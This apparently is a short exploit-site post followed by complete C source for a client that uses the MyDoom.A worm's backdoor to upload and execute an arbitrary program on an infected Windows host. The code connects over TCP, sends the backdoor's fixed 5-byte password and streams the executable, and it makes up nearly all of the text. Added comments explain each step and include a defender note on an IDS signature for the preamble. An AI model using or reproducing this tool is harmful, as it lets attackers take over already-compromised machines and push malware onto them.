
MyDoom.A Machines : The new P2P Sharing Network ...




As you know, MyDoom.A machines are exploited by MyDoom.C and Vesser - there is a 
faster and more dangerous worm exploiting these machines: its name is 
"kiddies"!!

So here is one of the codes used by hax0rz to exploit MyDoom.A machines (there are many 
other codes in the wild).

Regards.
Fabien // K-OTik Staff 
http://www.k-otik.com


// MyDoom.A Upload/Exec Backdoor
#include <stdio.h>
#include <string.h>
#include <winsock.h>

#pragma lib <ws2_32.lib>

/*
 * Entry point of the client for the MyDoom.A backdoor discussed in the
 * message above. Everything it does is visible in this function:
 *   1. open argv[3] in binary mode,
 *   2. initialise Winsock 1.1 and resolve argv[1] with gethostbyname(),
 *   3. open a TCP connection to argv[1] on port argv[2],
 *   4. send a fixed 5-byte preamble (doompassword) over that connection,
 *   5. stream the raw bytes of the opened file over the same connection.
 * Nothing is ever read back from the peer; the closing "All done" message is
 * printed unconditionally once the upload loop finishes.
 *
 * Defender note: the session is easy to recognise on the wire. The first five
 * bytes of the client->server stream are always 85 13 3c 9e a2 and are
 * immediately followed by the uploaded file's contents, so that preamble is
 * the natural anchor for an IDS signature or a packet-capture search.
 *
 * Returns 0 after the upload loop completes, -1 on any setup failure
 * (usage, fopen, WSAStartup, name resolution, socket, connect, send).
 */
int main(int argc,char *argv[]) {
 int sockfd, numbytes;   /* socket handle; byte count reported by the last send() */
 
struct hostent *he;               /* result of gethostbyname(argv[1]) */
struct sockaddr_in their_addr;    /* remote endpoint; sin_zero is never zeroed (see below) */
char doompassword[] = "\x85\x13\x3c\x9e\xa2";   /* fixed 5-byte preamble sent before the file */
char buf[1024];                   /* file -> socket staging buffer */
 int read=0;                      /* bytes returned by the last fread() */
FILE *fuckfile;                   /* argv[3], opened read-only in binary mode; never fclose()d */
 WSADATA wsaData;                 /* filled by WSAStartup(), otherwise unused */

 /* Only argv[1] and argv[2] are guaranteed to exist past this check;
  * argv[3] is dereferenced by fopen() below regardless. */
 if(argc<3)
 {
             printf("***************************************************\n");
     printf("***** MyDoom.A Upload/Exec Backdoor*****\n");
     printf("**** Usage: %s <ip> <port> <program to upload> ****\n", argv[0]);
             printf("***************************************************\n");
             return -1;
 }
 printf("[+] Opening File\n");

fuckfile = fopen(argv[3],"rb");   /* "rb": the file is streamed byte-for-byte, no text translation */
 if (fuckfile==NULL) {
 printf("[-] Open Failed\n");
 return -1;
 }
 printf("[+] File found ready to send\n");
 if(WSAStartup(0x101,&wsaData))   /* 0x101 requests Winsock version 1.1 */
 {
printf("[-] Unable to load winsock.\n");
             return -1;
 }
 if ((he=gethostbyname(argv[1])) == NULL) {  // resolve the host name or dotted IP given on the command line
         printf("[-] GetHostByName() Error!\n");
         return -1;
 }
 if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {   /* plain TCP socket */
         printf("[-] Can't open socket!\n");
         return -1;
 }
 their_addr.sin_family = AF_INET;    // IPv4 address family
 their_addr.sin_port = htons(atoi(argv[2]));  // port, converted to network byte order; atoi() does no validation
 their_addr.sin_addr = *((struct in_addr *)he->h_addr);   /* first resolved address only */
 //memset(&(their_addr.sin_zero), '\0', 8);  // left commented out: sin_zero stays uninitialised
 if (connect(sockfd, (struct sockaddr *)&their_addr,sizeof(struct sockaddr)) == 
-1) {
         printf("[-] Connecting error\n");
         return -1;
 }
 printf("[+] Connected\n[+] Sending executable.\n");
 send(sockfd,doompassword,5,0); // the 5-byte preamble goes first; its return value is not checked
 /* Classic feof()-controlled loop: fread() fills buf, send() forwards whatever
  * fread() returned. numbytes is only compared against -1, so a short send()
  * is not noticed; one '.' is printed per iteration as a progress mark. */
 while (!feof(fuckfile)) {
       read = fread(buf,sizeof(char),sizeof(buf),fuckfile);
       if ((numbytes=send(sockfd,buf,read,0)) == -1) {
          printf("[-] Sending executable failed\n");
          return -1;
       }
       printf(".");
 }
 /* No acknowledgement is read from the peer: this message reflects only that
  * the local upload loop ended, not anything observed on the remote side. */
 printf("[+] All done, server have now executed your executable!\n");
 closesocket(sockfd);
 WSACleanup();   /* fuckfile is never fclose()d; the OS reclaims it at exit */
 return 0;
}